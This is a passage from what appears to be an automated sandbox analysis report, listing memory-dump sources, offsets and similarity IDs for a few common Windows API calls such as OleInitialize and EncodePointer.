                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.915197066.0000000002B90000.00000040.00000001.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DuplicateHandle
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3793708945-0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlEncodePointer.NTDLL(00000000), ref: 02B9C222
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.915197066.0000000002B90000.00000040.00000001.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: EncodePointer
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2118026453-0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,05EDC127), ref: 05EDC1BF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.920321711.0000000005ED0000.00000040.00000001.sdmp, Offset: 05ED0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2492992576-0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 05EDCD45
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.920321711.0000000005ED0000.00000040.00000001.sdmp, Offset: 05ED0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Initialize
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2538663250-0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 05EDCD45
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.920321711.0000000005ED0000.00000040.00000001.sdmp, Offset: 05ED0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Initialize
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2538663250-0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.914169018.0000000000F4D000.00000040.00000001.sdmp, Offset: 00F4D000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.914651584.000000000115D000.00000040.00000001.sdmp, Offset: 0115D000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.914651584.000000000115D000.00000040.00000001.sdmp, Offset: 0115D000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.914169018.0000000000F4D000.00000040.00000001.sdmp, Offset: 00F4D000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Non-executed Functions